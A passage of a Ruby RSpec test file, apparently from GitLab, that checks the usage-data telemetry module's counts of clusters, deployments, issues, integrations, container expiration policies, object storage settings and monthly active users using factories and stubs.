1 }, group_imports: { group_import: 1, gitlab_migration: 1 }, projects_imported: { total: Gitlab::UsageData::DEPRECATED_VALUE, gitlab_project: Gitlab::UsageData::DEPRECATED_VALUE, gitlab: Gitlab::UsageData::DEPRECATED_VALUE, github: Gitlab::UsageData::DEPRECATED_VALUE, bitbucket: Gitlab::UsageData::DEPRECATED_VALUE, bitbucket_server: Gitlab::UsageData::DEPRECATED_VALUE, gitea: Gitlab::UsageData::DEPRECATED_VALUE, git: Gitlab::UsageData::DEPRECATED_VALUE, manifest: Gitlab::UsageData::DEPRECATED_VALUE }, issues_imported: { jira: Gitlab::UsageData::DEPRECATED_VALUE, fogbugz: Gitlab::UsageData::DEPRECATED_VALUE, phabricator: Gitlab::UsageData::DEPRECATED_VALUE, csv: Gitlab::UsageData::DEPRECATED_VALUE }, groups_imported: Gitlab::UsageData::DEPRECATED_VALUE } ) end def omniauth_providers [ OpenStruct.new(name: 'google_oauth2'), OpenStruct.new(name: 'ldapmain'), OpenStruct.new(name: 'group_saml') ] end end describe 'usage_activity_by_stage_monitor' do it 'includes accurate usage_activity_by_stage data' do for_defined_days_back do user = create(:user, dashboard: 'operations') cluster = create(:cluster, user: user) create(:project, creator: user) create(:clusters_applications_prometheus, :installed, cluster: cluster) create(:project_tracing_setting) create(:project_error_tracking_setting) create(:incident) create(:incident, alert_management_alert: create(:alert_management_alert)) end expect(described_class.usage_activity_by_stage_monitor({})).to include( clusters: 2, clusters_applications_prometheus: 2, operations_dashboard_default_dashboard: 2, projects_with_tracing_enabled: 2, projects_with_error_tracking_enabled: 2, projects_with_incidents: 4, projects_with_alert_incidents: 2 ) expect(described_class.usage_activity_by_stage_monitor(described_class.last_28_days_time_period)).to include( clusters: 1, clusters_applications_prometheus: 1, operations_dashboard_default_dashboard: 1, projects_with_tracing_enabled: 1, projects_with_error_tracking_enabled: 1, projects_with_incidents: 2, projects_with_alert_incidents: 1 ) end end describe 'usage_activity_by_stage_plan' do it 'includes accurate usage_activity_by_stage data' do for_defined_days_back do user = create(:user) project = create(:project, creator: user) issue = create(:issue, project: project, author: user) create(:issue, project: project, author: User.support_bot) create(:note, project: project, noteable: issue, author: user) create(:todo, project: project, target: issue, author: user) create(:jira_service, :jira_cloud_service, active: true, project: create(:project, :jira_dvcs_cloud, creator: user)) create(:jira_service, active: true, project: create(:project, :jira_dvcs_server, creator: user)) end expect(described_class.usage_activity_by_stage_plan({})).to include( issues: 3, notes: 2, projects: 2, todos: 2, service_desk_enabled_projects: 2, service_desk_issues: 2, projects_jira_active: 2, projects_jira_dvcs_cloud_active: 2, projects_jira_dvcs_server_active: 2 ) expect(described_class.usage_activity_by_stage_plan(described_class.last_28_days_time_period)).to include( issues: 2, notes: 1, projects: 1, todos: 1, service_desk_enabled_projects: 1, service_desk_issues: 1, projects_jira_active: 1, projects_jira_dvcs_cloud_active: 1, projects_jira_dvcs_server_active: 1 ) end end describe 'usage_activity_by_stage_release' do it 'includes accurate usage_activity_by_stage data' do for_defined_days_back do user = create(:user) create(:deployment, :failed, user: user) create(:release, author: user) create(:deployment, :success, user: user) end expect(described_class.usage_activity_by_stage_release({})).to include( deployments: 2, failed_deployments: 2, releases: 2, successful_deployments: 2 ) expect(described_class.usage_activity_by_stage_release(described_class.last_28_days_time_period)).to include( deployments: 1, failed_deployments: 1, releases: 1, successful_deployments: 1 ) end end describe 'usage_activity_by_stage_verify' do it 'includes accurate usage_activity_by_stage data' do for_defined_days_back do user = create(:user) create(:ci_build, user: user) create(:ci_empty_pipeline, source: :external, user: user) create(:ci_empty_pipeline, user: user) create(:ci_pipeline, :auto_devops_source, user: user) create(:ci_pipeline, :repository_source, user: user) create(:ci_pipeline_schedule, owner: user) create(:ci_trigger, owner: user) create(:clusters_applications_runner, :installed) end expect(described_class.usage_activity_by_stage_verify({})).to include( ci_builds: 2, ci_external_pipelines: 2, ci_internal_pipelines: 2, ci_pipeline_config_auto_devops: 2, ci_pipeline_config_repository: 2, ci_pipeline_schedules: 2, ci_pipelines: 2, ci_triggers: 2, clusters_applications_runner: 2 ) expect(described_class.usage_activity_by_stage_verify(described_class.last_28_days_time_period)).to include( ci_builds: 1, ci_external_pipelines: 1, ci_internal_pipelines: 1, ci_pipeline_config_auto_devops: 1, ci_pipeline_config_repository: 1, ci_pipeline_schedules: 1, ci_pipelines: 1, ci_triggers: 1, clusters_applications_runner: 1 ) end end describe '.data' do let!(:ud) { build(:usage_data) } before do allow(described_class).to receive(:grafana_embed_usage_data).and_return(2) end subject { described_class.data } it 'gathers usage data' do expect(subject.keys).to include(*UsageDataHelpers::USAGE_DATA_KEYS) end it 'gathers usage counts' do count_data = subject[:counts] expect(count_data[:boards]).to eq(1) expect(count_data[:projects]).to eq(4) expect(count_data.values_at(*UsageDataHelpers::SMAU_KEYS)).to all(be_an(Integer)) expect(count_data.keys).to include(*UsageDataHelpers::COUNTS_KEYS) expect(UsageDataHelpers::COUNTS_KEYS - count_data.keys).to be_empty end it 'gathers usage counts correctly' do count_data = subject[:counts] expect(count_data[:projects]).to eq(4) expect(count_data[:projects_asana_active]).to eq(0) expect(count_data[:projects_prometheus_active]).to eq(1) expect(count_data[:projects_jenkins_active]).to eq(1) expect(count_data[:projects_jira_active]).to eq(4) expect(count_data[:projects_jira_server_active]).to eq(2) expect(count_data[:projects_jira_cloud_active]).to eq(2) expect(count_data[:jira_imports_projects_count]).to eq(2) expect(count_data[:jira_imports_total_imported_count]).to eq(3) expect(count_data[:jira_imports_total_imported_issues_count]).to eq(13) expect(count_data[:projects_slack_active]).to eq(2) expect(count_data[:projects_slack_slash_commands_active]).to eq(1) expect(count_data[:projects_custom_issue_tracker_active]).to eq(1) expect(count_data[:projects_mattermost_active]).to eq(1) expect(count_data[:groups_mattermost_active]).to eq(1) expect(count_data[:templates_mattermost_active]).to eq(1) expect(count_data[:instances_mattermost_active]).to eq(1) expect(count_data[:projects_inheriting_mattermost_active]).to eq(1) expect(count_data[:groups_inheriting_slack_active]).to eq(1) expect(count_data[:projects_with_repositories_enabled]).to eq(3) expect(count_data[:projects_with_error_tracking_enabled]).to eq(1) expect(count_data[:projects_with_tracing_enabled]).to eq(1) expect(count_data[:projects_with_alerts_service_enabled]).to eq(1) expect(count_data[:projects_with_enabled_alert_integrations]).to eq(1) expect(count_data[:projects_with_prometheus_alerts]).to eq(2) expect(count_data[:projects_with_terraform_reports]).to eq(2) expect(count_data[:projects_with_terraform_states]).to eq(2) expect(count_data[:projects_with_alerts_created]).to eq(1) expect(count_data[:protected_branches]).to eq(2) expect(count_data[:protected_branches_except_default]).to eq(1) expect(count_data[:terraform_reports]).to eq(6) expect(count_data[:terraform_states]).to eq(3) expect(count_data[:issues_created_from_gitlab_error_tracking_ui]).to eq(1) expect(count_data[:issues_with_associated_zoom_link]).to eq(2) expect(count_data[:issues_using_zoom_quick_actions]).to eq(3) expect(count_data[:issues_with_embedded_grafana_charts_approx]).to eq(2) expect(count_data[:incident_issues]).to eq(4) expect(count_data[:issues_created_gitlab_alerts]).to eq(1) expect(count_data[:issues_created_from_alerts]).to eq(3) expect(count_data[:issues_created_manually_from_alerts]).to eq(1) expect(count_data[:alert_bot_incident_issues]).to eq(4) expect(count_data[:incident_labeled_issues]).to eq(3) expect(count_data[:clusters_enabled]).to eq(6) expect(count_data[:project_clusters_enabled]).to eq(4) expect(count_data[:group_clusters_enabled]).to eq(1) expect(count_data[:instance_clusters_enabled]).to eq(1) expect(count_data[:clusters_disabled]).to eq(3) expect(count_data[:project_clusters_disabled]).to eq(1) expect(count_data[:group_clusters_disabled]).to eq(1) expect(count_data[:instance_clusters_disabled]).to eq(1) expect(count_data[:clusters_platforms_eks]).to eq(1) expect(count_data[:clusters_platforms_gke]).to eq(1) expect(count_data[:clusters_platforms_user]).to eq(1) expect(count_data[:clusters_applications_helm]).to eq(1) expect(count_data[:clusters_applications_ingress]).to eq(1) expect(count_data[:clusters_applications_cert_managers]).to eq(1) expect(count_data[:clusters_applications_crossplane]).to eq(1) expect(count_data[:clusters_applications_prometheus]).to eq(1) expect(count_data[:clusters_applications_runner]).to eq(1) expect(count_data[:clusters_applications_knative]).to eq(1) expect(count_data[:clusters_applications_elastic_stack]).to eq(1) expect(count_data[:grafana_integrated_projects]).to eq(2) expect(count_data[:clusters_applications_jupyter]).to eq(1) expect(count_data[:clusters_applications_cilium]).to eq(1) expect(count_data[:clusters_management_project]).to eq(1) expect(count_data[:kubernetes_agents]).to eq(2) expect(count_data[:kubernetes_agents_with_token]).to eq(1) expect(count_data[:deployments]).to eq(4) expect(count_data[:successful_deployments]).to eq(2) expect(count_data[:failed_deployments]).to eq(2) expect(count_data[:snippets]).to eq(6) expect(count_data[:personal_snippets]).to eq(2) expect(count_data[:project_snippets]).to eq(4) expect(count_data[:projects_creating_incidents]).to eq(2) expect(count_data[:projects_with_packages]).to eq(2) expect(count_data[:packages]).to eq(4) expect(count_data[:user_preferences_user_gitpod_enabled]).to eq(1) end it 'gathers object store usage correctly' do expect(subject[:object_store]).to eq( { artifacts: { enabled: true, object_store: { enabled: true, direct_upload: true, background_upload: false, provider: "AWS" } }, external_diffs: { enabled: false }, lfs: { enabled: true, object_store: { enabled: false, direct_upload: true, background_upload: false, provider: "AWS" } }, uploads: { enabled: nil, object_store: { enabled: false, direct_upload: true, background_upload: false, provider: "AWS" } }, packages: { enabled: true, object_store: { enabled: false, direct_upload: false, background_upload: true, provider: "AWS" } } } ) end context 'with existing container expiration policies' do let_it_be(:disabled) { create(:container_expiration_policy, enabled: false) } let_it_be(:enabled) { create(:container_expiration_policy, enabled: true) } %i[keep_n cadence older_than].each do |attribute| ContainerExpirationPolicy.send("#{attribute}_options").keys.each do |value| let_it_be("container_expiration_policy_with_#{attribute}_set_to_#{value}") { create(:container_expiration_policy, attribute => value) } end end let_it_be('container_expiration_policy_with_keep_n_set_to_null') { create(:container_expiration_policy, keep_n: nil) } let_it_be('container_expiration_policy_with_older_than_set_to_null') { create(:container_expiration_policy, older_than: nil) } let(:inactive_policies) { ::ContainerExpirationPolicy.where(enabled: false) } let(:active_policies) { ::ContainerExpirationPolicy.active } subject { described_class.data[:counts] } it 'gathers usage data' do expect(subject[:projects_with_expiration_policy_enabled]).to eq 18 expect(subject[:projects_with_expiration_policy_disabled]).to eq 5 expect(subject[:projects_with_expiration_policy_enabled_with_keep_n_unset]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_keep_n_set_to_1]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_keep_n_set_to_5]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_keep_n_set_to_10]).to eq 12 expect(subject[:projects_with_expiration_policy_enabled_with_keep_n_set_to_25]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_keep_n_set_to_50]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_older_than_unset]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_older_than_set_to_7d]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_older_than_set_to_14d]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_older_than_set_to_30d]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_older_than_set_to_90d]).to eq 14 expect(subject[:projects_with_expiration_policy_enabled_with_cadence_set_to_1d]).to eq 14 expect(subject[:projects_with_expiration_policy_enabled_with_cadence_set_to_7d]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_cadence_set_to_14d]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_cadence_set_to_1month]).to eq 1 expect(subject[:projects_with_expiration_policy_enabled_with_cadence_set_to_3month]).to eq 1 end end it 'works when queries time out' do allow_any_instance_of(ActiveRecord::Relation) .to receive(:count).and_raise(ActiveRecord::StatementInvalid.new('')) expect { subject }.not_to raise_error end it 'includes a recording_ce_finished_at timestamp' do expect(subject[:recording_ce_finished_at]).to be_a(Time) end it 'jira usage works when queries time out' do allow_any_instance_of(ActiveRecord::Relation) .to receive(:find_in_batches).and_raise(ActiveRecord::StatementInvalid.new('')) expect { described_class.jira_usage }.not_to raise_error end end describe '.system_usage_data_monthly' do let_it_be(:project) { create(:project) } before do project = create(:project) env = create(:environment) create(:package, project: project, created_at: 3.days.ago) create(:package, created_at: 2.months.ago, project: project) [3, 31].each do |n| deployment_options = { created_at: n.days.ago, project: env.project, environment: env } create(:deployment, :failed, deployment_options) create(:deployment, :success, deployment_options) create(:project_snippet, project: project, created_at: n.days.ago) create(:personal_snippet, created_at: n.days.ago) create(:alert_management_alert, project: project, created_at: n.days.ago) end stub_application_setting(self_monitoring_project: project) for_defined_days_back do create(:product_analytics_event, project: project, se_category: 'epics', se_action: 'promote') end end subject { described_class.system_usage_data_monthly } it 'gathers monthly usage counts correctly' do counts_monthly = subject[:counts_monthly] expect(counts_monthly[:deployments]).to eq(2) expect(counts_monthly[:successful_deployments]).to eq(1) expect(counts_monthly[:failed_deployments]).to eq(1) expect(counts_monthly[:snippets]).to eq(2) expect(counts_monthly[:personal_snippets]).to eq(1) expect(counts_monthly[:project_snippets]).to eq(1) expect(counts_monthly[:projects_with_alerts_created]).to eq(1) expect(counts_monthly[:packages]).to eq(1) expect(counts_monthly[:promoted_issues]).to eq(1) end end describe '.usage_counters' do subject { described_class.usage_counters } it { is_expected.to include(:kubernetes_agent_gitops_sync) } it { is_expected.to include(:static_site_editor_views) } it { is_expected.to include(:package_events_i_package_pull_package) } it { is_expected.to include(:package_events_i_package_delete_package_by_user) } it { is_expected.to include(:package_events_i_package_conan_push_package) } end describe '.usage_data_counters' do subject { described_class.usage_data_counters } it { is_expected.to all(respond_to :totals) } it { is_expected.to all(respond_to :fallback_totals) } describe 'the results of calling #totals on all objects in the array' do subject { described_class.usage_data_counters.map(&:totals) } it { is_expected.to all(be_a Hash) } it { is_expected.to all(have_attributes(keys: all(be_a Symbol), values: all(be_a Integer))) } end describe 'the results of calling #fallback_totals on all objects in the array' do subject { described_class.usage_data_counters.map(&:fallback_totals) } it { is_expected.to all(be_a Hash) } it { is_expected.to all(have_attributes(keys: all(be_a Symbol), values: all(eq(-1)))) } end it 'does not have any conflicts' do all_keys = subject.flat_map { |counter| counter.totals.keys } expect(all_keys.size).to eq all_keys.to_set.size end end describe '.license_usage_data' do subject { described_class.license_usage_data } it 'gathers license data' do expect(subject[:uuid]).to eq(Gitlab::CurrentSettings.uuid) expect(subject[:version]).to eq(Gitlab::VERSION) expect(subject[:installation_type]).to eq('gitlab-development-kit') expect(subject[:active_user_count]).to eq(User.active.size) expect(subject[:recorded_at]).to be_a(Time) end end context 'when not relying on database records' do describe '.features_usage_data_ce' do subject { described_class.features_usage_data_ce } it 'gathers feature usage data', :aggregate_failures do expect(subject[:instance_auto_devops_enabled]).to eq(Gitlab::CurrentSettings.auto_devops_enabled?) expect(subject[:mattermost_enabled]).to eq(Gitlab.config.mattermost.enabled) expect(subject[:signup_enabled]).to eq(Gitlab::CurrentSettings.allow_signup?) expect(subject[:ldap_enabled]).to eq(Gitlab.config.ldap.enabled) expect(subject[:gravatar_enabled]).to eq(Gitlab::CurrentSettings.gravatar_enabled?) expect(subject[:omniauth_enabled]).to eq(Gitlab::Auth.omniauth_enabled?) expect(subject[:reply_by_email_enabled]).to eq(Gitlab::IncomingEmail.enabled?) expect(subject[:container_registry_enabled]).to eq(Gitlab.config.registry.enabled) expect(subject[:dependency_proxy_enabled]).to eq(Gitlab.config.dependency_proxy.enabled) expect(subject[:gitlab_shared_runners_enabled]).to eq(Gitlab.config.gitlab_ci.shared_runners_enabled) expect(subject[:web_ide_clientside_preview_enabled]).to eq(Gitlab::CurrentSettings.web_ide_clientside_preview_enabled?) expect(subject[:grafana_link_enabled]).to eq(Gitlab::CurrentSettings.grafana_enabled?) expect(subject[:gitpod_enabled]).to eq(Gitlab::CurrentSettings.gitpod_enabled?) end context 'with embedded Prometheus' do it 'returns true when embedded Prometheus is enabled' do allow(Gitlab::Prometheus::Internal).to receive(:prometheus_enabled?).and_return(true) expect(subject[:prometheus_enabled]).to eq(true) end it 'returns false when embedded Prometheus is disabled' do allow(Gitlab::Prometheus::Internal).to receive(:prometheus_enabled?).and_return(false) expect(subject[:prometheus_enabled]).to eq(false) end end context 'with embedded grafana' do it 'returns true when embedded grafana is enabled' do stub_application_setting(grafana_enabled: true) expect(subject[:grafana_link_enabled]).to eq(true) end it 'returns false when embedded grafana is disabled' do stub_application_setting(grafana_enabled: false) expect(subject[:grafana_link_enabled]).to eq(false) end end context 'with Gitpod' do it 'returns true when is enabled' do stub_application_setting(gitpod_enabled: true) expect(subject[:gitpod_enabled]).to eq(true) end it 'returns false when is disabled' do stub_application_setting(gitpod_enabled: false) expect(subject[:gitpod_enabled]).to eq(false) end end end describe '.components_usage_data' do subject { described_class.components_usage_data } it 'gathers basic components usage data' do stub_application_setting(container_registry_vendor: 'gitlab', container_registry_version: 'x.y.z') expect(subject[:gitlab_pages][:enabled]).to eq(Gitlab.config.pages.enabled) expect(subject[:gitlab_pages][:version]).to eq(Gitlab::Pages::VERSION) expect(subject[:git][:version]).to eq(Gitlab::Git.version) expect(subject[:database][:adapter]).to eq(Gitlab::Database.adapter_name) expect(subject[:database][:version]).to eq(Gitlab::Database.version) expect(subject[:database][:pg_system_id]).to eq(Gitlab::Database.system_id) expect(subject[:mail][:smtp_server]).to eq(ActionMailer::Base.smtp_settings[:address]) expect(subject[:gitaly][:version]).to be_present expect(subject[:gitaly][:servers]).to be >= 1 expect(subject[:gitaly][:clusters]).to be >= 0 expect(subject[:gitaly][:filesystems]).to be_an(Array) expect(subject[:gitaly][:filesystems].first).to be_a(String) expect(subject[:container_registry_server][:vendor]).to eq('gitlab') expect(subject[:container_registry_server][:version]).to eq('x.y.z') end end describe '.object_store_config' do let(:component) { 'lfs' } subject { described_class.object_store_config(component) } context 'when object_store is not configured' do it 'returns component enable status only' do allow(Settings).to receive(:[]).with(component).and_return({ 'enabled' => false }) expect(subject).to eq({ enabled: false }) end end context 'when object_store is configured' do it 'returns filtered object store config' do allow(Settings).to receive(:[]).with(component) .and_return( { 'enabled' => true, 'object_store' => { 'enabled' => true, 'remote_directory' => component, 'direct_upload' => true, 'connection' => { 'provider' => 'AWS', 'aws_access_key_id' => 'minio', 'aws_secret_access_key' => 'gdk-minio', 'region' => 'gdk', 'endpoint' => '', 'path_style' => true }, 'background_upload' => false, 'proxy_download' => false } }) expect(subject).to eq( { enabled: true, object_store: { enabled: true, direct_upload: true, background_upload: false, provider: "AWS" } }) end end context 'when retrieve component setting meets exception' do it 'returns -1 for component enable status' do allow(Settings).to receive(:[]).with(component).and_raise(StandardError) expect(subject).to eq({ enabled: -1 }) end end end describe '.object_store_usage_data' do subject { described_class.object_store_usage_data } it 'fetches object store config of five components' do %w(artifacts external_diffs lfs uploads packages).each do |component| expect(described_class).to receive(:object_store_config).with(component).and_return("#{component}_object_store_config") end expect(subject).to eq( object_store: { artifacts: 'artifacts_object_store_config', external_diffs: 'external_diffs_object_store_config', lfs: 'lfs_object_store_config', uploads: 'uploads_object_store_config', packages: 'packages_object_store_config' }) end end describe '.ingress_modsecurity_usage' do subject { described_class.ingress_modsecurity_usage } let(:environment) { create(:environment) } let(:project) { environment.project } let(:environment_scope) { '*' } let(:deployment) { create(:deployment, :success, environment: environment, project: project, cluster: cluster) } let(:cluster) { create(:cluster, environment_scope: environment_scope, projects: [project]) } let(:ingress_mode) { :modsecurity_blocking } let!(:ingress) { create(:clusters_applications_ingress, ingress_mode, cluster: cluster) } context 'when cluster is disabled' do let(:cluster) { create(:cluster, :disabled, projects: [project]) } it 'gathers ingress data' do expect(subject[:ingress_modsecurity_logging]).to eq(0) expect(subject[:ingress_modsecurity_blocking]).to eq(0) expect(subject[:ingress_modsecurity_disabled]).to eq(0) expect(subject[:ingress_modsecurity_not_installed]).to eq(0) end end context 'when deployment is unsuccessful' do let!(:deployment) { create(:deployment, :failed, environment: environment, project: project, cluster: cluster) } it 'gathers ingress data' do expect(subject[:ingress_modsecurity_logging]).to eq(0) expect(subject[:ingress_modsecurity_blocking]).to eq(0) expect(subject[:ingress_modsecurity_disabled]).to eq(0) expect(subject[:ingress_modsecurity_not_installed]).to eq(0) end end context 'when deployment is successful' do let!(:deployment) { create(:deployment, :success, environment: environment, project: project, cluster: cluster) } context 'when modsecurity is in blocking mode' do it 'gathers ingress data' do expect(subject[:ingress_modsecurity_logging]).to eq(0) expect(subject[:ingress_modsecurity_blocking]).to eq(1) expect(subject[:ingress_modsecurity_disabled]).to eq(0) expect(subject[:ingress_modsecurity_not_installed]).to eq(0) end end context 'when modsecurity is in logging mode' do let(:ingress_mode) { :modsecurity_logging } it 'gathers ingress data' do expect(subject[:ingress_modsecurity_logging]).to eq(1) expect(subject[:ingress_modsecurity_blocking]).to eq(0) expect(subject[:ingress_modsecurity_disabled]).to eq(0) expect(subject[:ingress_modsecurity_not_installed]).to eq(0) end end context 'when modsecurity is disabled' do let(:ingress_mode) { :modsecurity_disabled } it 'gathers ingress data' do expect(subject[:ingress_modsecurity_logging]).to eq(0) expect(subject[:ingress_modsecurity_blocking]).to eq(0) expect(subject[:ingress_modsecurity_disabled]).to eq(1) expect(subject[:ingress_modsecurity_not_installed]).to eq(0) end end context 'when modsecurity is not installed' do let(:ingress_mode) { :modsecurity_not_installed } it 'gathers ingress data' do expect(subject[:ingress_modsecurity_logging]).to eq(0) expect(subject[:ingress_modsecurity_blocking]).to eq(0) expect(subject[:ingress_modsecurity_disabled]).to eq(0) expect(subject[:ingress_modsecurity_not_installed]).to eq(1) end end context 'with multiple projects' do let(:environment_2) { create(:environment) } let(:project_2) { environment_2.project } let(:cluster_2) { create(:cluster, environment_scope: environment_scope, projects: [project_2]) } let!(:ingress_2) { create(:clusters_applications_ingress, :modsecurity_logging, cluster: cluster_2) } let!(:deployment_2) { create(:deployment, :success, environment: environment_2, project: project_2, cluster: cluster_2) } it 'gathers non-duplicated ingress data' do expect(subject[:ingress_modsecurity_logging]).to eq(1) expect(subject[:ingress_modsecurity_blocking]).to eq(1) expect(subject[:ingress_modsecurity_disabled]).to eq(0) expect(subject[:ingress_modsecurity_not_installed]).to eq(0) end end context 'with multiple deployments' do let!(:deployment_2) { create(:deployment, :success, environment: environment, project: project, cluster: cluster) } it 'gathers non-duplicated ingress data' do expect(subject[:ingress_modsecurity_logging]).to eq(0) expect(subject[:ingress_modsecurity_blocking]).to eq(1) expect(subject[:ingress_modsecurity_disabled]).to eq(0) expect(subject[:ingress_modsecurity_not_installed]).to eq(0) end end context 'with multiple projects' do let(:environment_2) { create(:environment) } let(:project_2) { environment_2.project } let!(:deployment_2) { create(:deployment, :success, environment: environment_2, project: project_2, cluster: cluster) } let(:cluster) { create(:cluster, environment_scope: environment_scope, projects: [project, project_2]) } it 'gathers ingress data' do expect(subject[:ingress_modsecurity_logging]).to eq(0) expect(subject[:ingress_modsecurity_blocking]).to eq(2) expect(subject[:ingress_modsecurity_disabled]).to eq(0) expect(subject[:ingress_modsecurity_not_installed]).to eq(0) end end context 'with multiple environments' do let!(:environment_2) { create(:environment, project: project) } let!(:deployment_2) { create(:deployment, :success, environment: environment_2, project: project, cluster: cluster) } it 'gathers ingress data' do expect(subject[:ingress_modsecurity_logging]).to eq(0) expect(subject[:ingress_modsecurity_blocking]).to eq(2) expect(subject[:ingress_modsecurity_disabled]).to eq(0) expect(subject[:ingress_modsecurity_not_installed]).to eq(0) end end end end describe '.grafana_embed_usage_data' do subject { described_class.grafana_embed_usage_data } let(:project) { create(:project) } let(:description_with_embed) { "Some comment\n\nhttps://grafana.example.com/d/xvAk4q0Wk/go-processes?orgId=1&from=1573238522762&to=1573240322762&var-job=prometheus&var-interval=10m&panelId=1&fullscreen" } let(:description_with_unintegrated_embed) { "Some comment\n\nhttps://grafana.exp.com/d/xvAk4q0Wk/go-processes?orgId=1&from=1573238522762&to=1573240322762&var-job=prometheus&var-interval=10m&panelId=1&fullscreen" } let(:description_with_non_grafana_inline_metric) { "Some comment\n\n#{Gitlab::Routing.url_helpers.metrics_namespace_project_environment_url(*['foo', 'bar', 12])}" } shared_examples "zero count" do it "does not count the issue" do expect(subject).to eq(0) end end context 'with project grafana integration enabled' do before do create(:grafana_integration, project: project, enabled: true) end context 'with valid and invalid embeds' do before do # Valid create(:issue, project: project, description: description_with_embed) create(:issue, project: project, description: description_with_embed) # In-Valid create(:issue, project: project, description: description_with_unintegrated_embed) create(:issue, project: project, description: description_with_non_grafana_inline_metric) create(:issue, project: project, description: nil) create(:issue, project: project, description: '') create(:issue, project: project) end it 'counts only the issues with embeds' do expect(subject).to eq(2) end end end context 'with project grafana integration disabled' do before do create(:grafana_integration, project: project, enabled: false) end context 'with one issue having a grafana link in the description and one without' do before do create(:issue, project: project, description: description_with_embed) create(:issue, project: project) end it_behaves_like('zero count') end end context 'with an un-integrated project' do context 'with one issue having a grafana link in the description and one without' do before do create(:issue, project: project, description: description_with_embed) create(:issue, project: project) end it_behaves_like('zero count') end end end describe ".operating_system" do let(:ohai_data) { { "platform" => "ubuntu", "platform_version" => "20.04" } } before do allow_next_instance_of(Ohai::System) do |ohai| allow(ohai).to receive(:data).and_return(ohai_data) end end subject { described_class.operating_system } it { is_expected.to eq("ubuntu-20.04") } context 'when on Debian with armv architecture' do let(:ohai_data) { { "platform" => "debian", "platform_version" => "10", 'kernel' => { 'machine' => 'armv' } } } it { is_expected.to eq("raspbian-10") } end end describe ".system_usage_data_settings" do before do allow(described_class).to receive(:operating_system).and_return('ubuntu-20.04') end subject { described_class.system_usage_data_settings } it 'gathers settings usage data', :aggregate_failures do expect(subject[:settings][:ldap_encrypted_secrets_enabled]).to eq(Gitlab::Auth::Ldap::Config.encrypted_secrets.active?) end it 'populates operating system information' do expect(subject[:settings][:operating_system]).to eq('ubuntu-20.04') end end end describe '.merge_requests_users', :clean_gitlab_redis_shared_state do let(:time_period) { { created_at: 2.days.ago..time } } let(:time) { Time.current } before do counter = Gitlab::UsageDataCounters::TrackUniqueEvents merge_request = Event::TARGET_TYPES[:merge_request] design = Event::TARGET_TYPES[:design] counter.track_event(event_action: :commented, event_target: merge_request, author_id: 1, time: time) counter.track_event(event_action: :opened, event_target: merge_request, author_id: 1, time: time) counter.track_event(event_action: :merged, event_target: merge_request, author_id: 2, time: time) counter.track_event(event_action: :closed, event_target: merge_request, author_id: 3, time: time) counter.track_event(event_action: :opened, event_target: merge_request, author_id: 4, time: time - 3.days) counter.track_event(event_action: :created, event_target: design, author_id: 5, time: time) end it 'returns the distinct count of users using merge requests (via events table) within the specified time period' do expect(described_class.merge_requests_users(time_period)).to eq(3) end end def for_defined_days_back(days: [31, 3]) days.each do |n| travel_to(n.days.ago) do yield end end end describe '#action_monthly_active_users', :clean_gitlab_redis_shared_state do let(:time_period) { { created_at: 2.days.ago..time } } let(:time) { Time.zone.now } let(:user1) { build(:user, id: 1) } let(:user2) { build(:user, id: 2) } let(:user3) { build(:user, id: 3) } let(:user4) { build(:user, id: 4) } before do counter = Gitlab::UsageDataCounters::TrackUniqueEvents project = Event::TARGET_TYPES[:project] wiki = Event::TARGET_TYPES[:wiki] design = Event::TARGET_TYPES[:design] counter.track_event(event_action: :pushed, event_target: project, author_id: 1) counter.track_event(event_action: :pushed, event_target: project, author_id: 1) counter.track_event(event_action: :pushed, event_target: project, author_id: 2) counter.track_event(event_action: :pushed, event_target: project, author_id: 3) counter.track_event(event_action: :pushed, event_target: project, author_id: 4, time: time - 3.days) counter.track_event(event_action: :created, event_target: wiki, author_id: 3) counter.track_event(event_action: :created, event_target: design, author_id: 3) counter.track_event(event_action: :created, event_target: design, author_id: 4) counter = Gitlab::UsageDataCounters::EditorUniqueCounter counter.track_web_ide_edit_action(author: user1) counter.track_web_ide_edit_action(author: user1) counter.track_sfe_edit_action(author: user1) counter.track_snippet_editor_edit_action(author: user1) counter.track_snippet_editor_edit_action(author: user1, time: time - 3.days) counter.track_web_ide_edit_action(author: user2) counter.track_sfe_edit_action(author: user2) counter.track_web_ide_edit_action(author: user3, time: time - 3.days) counter.track_snippet_editor_edit_action(author: user3) counter.track_sse_edit_action(author: user1) counter.track_sse_edit_action(author: user1) counter.track_sse_edit_action(author: user2) counter.track_sse_edit_action(author: user3) counter.track_sse_edit_action(author: user2, time: time - 3.days) end it 'returns the distinct count of user actions within the specified time period' do expect(described_class.action_monthly_active_users(time_period)).to eq( { action_monthly_active_users_design_management: 2, action_monthly_active_users_project_repo: 3, action_monthly_active_users_wiki_repo: 1, action_monthly_active_users_git_write: 4, action_monthly_active_users_web_ide_edit: 2, action_monthly_active_users_sfe_edit: 2, action_monthly_active_users_snippet_editor_edit: 2, action_monthly_active_users_ide_edit: 3, action_monthly_active_users_sse_edit: 3 } ) end end describe '.analytics_unique_visits_data' do subject { described_class.analytics_unique_visits_data } it 'returns the number of unique visits to pages with analytics features' do ::Gitlab::Analytics::UniqueVisits.analytics_events.each do |target| expect_any_instance_of(::Gitlab::Analytics::UniqueVisits).to receive(:unique_visits_for).with(targets: target).and_return(123) end expect_any_instance_of(::Gitlab::Analytics::UniqueVisits).to receive(:unique_visits_for).with(targets: :analytics).and_return(543) expect_any_instance_of(::Gitlab::Analytics::UniqueVisits).to receive(:unique_visits_for).with(targets: :analytics, start_date: 4.weeks.ago.to_date, end_date: Date.current).and_return(987) expect(subject).to eq({ analytics_unique_visits: { 'g_analytics_contribution' => 123, 'g_analytics_insights' => 123, 'g_analytics_issues' => 123, 'g_analytics_productivity' => 123, 'g_analytics_valuestream' => 123, 'p_analytics_pipelines' => 123, 'p_analytics_code_reviews' => 123, 'p_analytics_valuestream' => 123, 'p_analytics_insights' => 123, 'p_analytics_issues' => 123, 'p_analytics_repo' => 123, 'i_analytics_cohorts' => 123, 